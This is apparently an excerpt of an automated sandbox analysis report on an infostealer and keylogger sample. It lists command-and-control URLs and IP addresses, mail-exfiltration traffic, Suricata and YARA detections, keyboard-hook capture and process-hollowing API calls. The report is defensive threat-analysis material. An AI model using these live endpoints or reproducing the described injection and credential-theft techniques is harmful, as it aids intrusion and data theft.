                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 4x nop then jmp 0549BCBDh16_2_0549BA40

                      Networking

                      barindex
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: https://gxe0.com/yak/233_Wisrysxlfss
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02EDE4B8 InternetCheckConnectionA,0_2_02EDE4B8
                      Source: global trafficTCP traffic: 192.168.2.6:49714 -> 51.195.88.199:587
                      Source: Joe Sandbox ViewIP Address: 198.252.105.91 198.252.105.91
                      Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                      Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: api.ipify.org
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49710 -> 198.252.105.91:443
                      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.6:49721
                      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.6:49888
                      Source: global trafficTCP traffic: 192.168.2.6:49714 -> 51.195.88.199:587
                      Source: global trafficHTTP traffic detected: GET /yak/233_Wisrysxlfss HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: gxe0.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /yak/233_Wisrysxlfss HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: gxe0.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: gxe0.com
                      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                      Source: global trafficDNS traffic detected: DNS query: s82.gocheapweb.com
                      Source: global trafficDNS traffic detected: DNS query: pywolwnvd.biz
                      Source: x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: powershell.exe, 0000000B.00000002.2308580044.0000000007D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                      Source: x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                      Source: x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                      Source: x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                      Source: x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                      Source: powershell.exe, 0000000B.00000002.2290455429.00000000051D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                      Source: x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                      Source: x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                      Source: x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                      Source: x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                      Source: powershell.exe, 0000000B.00000002.2269466131.00000000042C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: neworigin.exe, 00000009.00000002.2395131406.0000000002C7B000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2350888427.0000000000E27000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2434061212.00000000063C9000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2395131406.0000000002BF4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2350888427.0000000000E3E000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000019.00000002.2433816263.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000019.00000002.2459185652.0000000002B94000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000019.00000002.2433816263.0000000000E56000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4585647211.0000000001465000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4593833570.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4593833570.000000000335A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r11.i.lencr.org/0
                      Source: neworigin.exe, 00000009.00000002.2395131406.0000000002C7B000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2350888427.0000000000E27000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2434061212.00000000063C9000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2395131406.0000000002BF4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2350888427.0000000000E3E000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000019.00000002.2433816263.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000019.00000002.2459185652.0000000002B94000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000019.00000002.2433816263.0000000000E56000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4585647211.0000000001465000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4593833570.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4593833570.000000000335A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r11.o.lencr.org0#
                      Source: neworigin.exe, 00000009.00000002.2395131406.0000000002BEC000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2395131406.0000000002C7B000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000019.00000002.2459185652.0000000002B8C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4593833570.000000000329C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4593833570.000000000335A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s82.gocheapweb.com
                      Source: powershell.exe, 0000000B.00000002.2269466131.00000000042C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: neworigin.exe, 00000009.00000002.2395131406.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2269466131.0000000004171000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000019.00000002.2459185652.0000000002B1C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4593833570.000000000322C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 0000000B.00000002.2269466131.00000000042C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: powershell.exe, 0000000B.00000002.2269466131.00000000042C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2264345961.0000000000542000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: x.exe, x.exe, 00000000.00000002.2243776904.0000000021E70000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000000.00000002.2233962338.0000000020C24000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2244527855.000000002206F000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2180899022.00000000008DE000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000000.00000002.2233962338.0000000020BA3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2111562829.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2111145235.0000000002C11000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000000.00000002.2200179187.0000000002E4A000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000000.00000002.2262163417.000000007FC4F000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000008.00000000.2181503594.0000000000416000.00000002.00000001.01000000.00000006.sdmp, Wisrysxl.PIF, 00000016.00000002.2352049831.0000000002D22000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000018.00000000.2336227084.0000000000416000.00000002.00000001.01000000.00000006.sdmp, Wisrysxl.PIF, 0000001B.00000002.2435548911.0000000002DF2000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001C.00000000.2411094000.0000000000416000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.pmail.com
                      Source: neworigin.exe, 00000009.00000002.2395131406.0000000002C7B000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2350888427.0000000000E27000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2434061212.00000000063C9000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2395131406.0000000002BF4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2350888427.0000000000E66000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2350888427.0000000000E3E000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000019.00000002.2494316547.0000000006422000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000019.00000002.2433816263.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000019.00000002.2459185652.0000000002B94000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4585647211.0000000001465000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4593833570.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4593833570.000000000335A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                      Source: neworigin.exe, 00000009.00000002.2395131406.0000000002C7B000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2350888427.0000000000E27000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2434061212.00000000063C9000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2395131406.0000000002BF4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2350888427.0000000000E66000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2350888427.0000000000E3E000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000019.00000002.2494316547.0000000006422000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000019.00000002.2433816263.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000019.00000002.2459185652.0000000002B94000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4585647211.0000000001465000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4593833570.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4593833570.000000000335A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                      Source: neworigin.exe, 00000009.00000000.2187675725.0000000000842000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: powershell.exe, 0000000B.00000002.2269466131.0000000004171000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                      Source: neworigin.exe, 00000009.00000002.2395131406.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000000.2187675725.0000000000842000.00000002.00000001.01000000.00000008.sdmp, neworigin.exe, 00000019.00000002.2459185652.0000000002B1C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4593833570.000000000322C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                      Source: neworigin.exe, 00000009.00000002.2395131406.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000019.00000002.2459185652.0000000002B1C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4593833570.000000000322C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                      Source: neworigin.exe, 00000009.00000002.2395131406.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000019.00000002.2459185652.0000000002B1C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.4593833570.000000000322C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                      Source: powershell.exe, 0000000B.00000002.2290455429.00000000051D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 0000000B.00000002.2290455429.00000000051D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 0000000B.00000002.2290455429.00000000051D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 0000000B.00000002.2269466131.00000000042C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: x.exe, 00000000.00000002.2184605014.0000000000886000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/t
                      Source: x.exe, 00000000.00000002.2233962338.0000000020CAD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak/233_Wisrysx
                      Source: x.exe, 00000000.00000002.2184605014.000000000081E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak/233_Wisrysxlfss
                      Source: x.exe, 00000000.00000002.2184605014.0000000000899000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com:443/yak/233_WisrysxlfssX
                      Source: powershell.exe, 0000000B.00000002.2290455429.00000000051D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                      Source: unknownHTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.6:49710 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:49712 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:49750 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:49781 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Contains functionality to log keystrokes (.Net Source)
                      Source: neworigin.exe.8.dr, cPKWk.cs.Net Code: I3Mi2zn6x
                      Installs a global keyboard hook
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\neworigin.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\neworigin.exe
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeWindow created: window name: CLIPBRDWNDCLASS
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow created: window name: CLIPBRDWNDCLASS

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 9.0.neworigin.exe.840000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPEDMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      .NET source code contains very large strings
                      Source: server_BTC.exe.8.dr, opqcmgIPmeabY.csLong String: Length: 17605
                      Source: TrojanAIbot.exe.10.dr, opqcmgIPmeabY.csLong String: Length: 17605
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02ED8670 NtUnmapViewOfSection,0_2_02ED8670
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02ED8400 NtReadVirtualMemory,0_2_02ED8400
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02ED7A2C NtAllocateVirtualMemory,0_2_02ED7A2C
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02EDDC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_02EDDC8C
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02EDDC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_02EDDC04
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02ED7D78 NtWriteVirtualMemory,0_2_02ED7D78
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02ED8D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_02ED8D70
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02EDDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_02EDDD70
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02ED7A2A NtAllocateVirtualMemory,0_2_02ED7A2A
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02EDDBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_02EDDBB0
                      Source: C:\Users\user\Desktop\x.exeCode function: 0_2_02ED8D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_02ED8D6E
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 22_2_02CB8670 NtUnmapViewOfSection,22_2_02CB8670
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 22_2_02CB8400 NtReadVirtualMemory,22_2_02CB8400
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 22_2_02CB7A2C NtAllocateVirtualMemory,22_2_02CB7A2C
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 22_2_02CB7D78 NtWriteVirtualMemory,22_2_02CB7D78
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 22_2_02CB8D70 Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread,22_2_02CB8D70
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 22_2_02CBDD70 NtOpenFile,NtReadFile,NtClose,22_2_02CBDD70
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 22_2_02CB86F7 NtUnmapViewOfSection,22_2_02CB86F7
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 22_2_02CB7AC9 NtAllocateVirtualMemory,22_2_02CB7AC9
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 22_2_02CB7A2A NtAllocateVirtualMemory,22_2_02CB7A2A
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 22_2_02CB8D6E Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread,22_2_02CB8D6E
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 27_2_02D88670 NtUnmapViewOfSection,27_2_02D88670
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 27_2_02D88400 NtReadVirtualMemory,27_2_02D88400
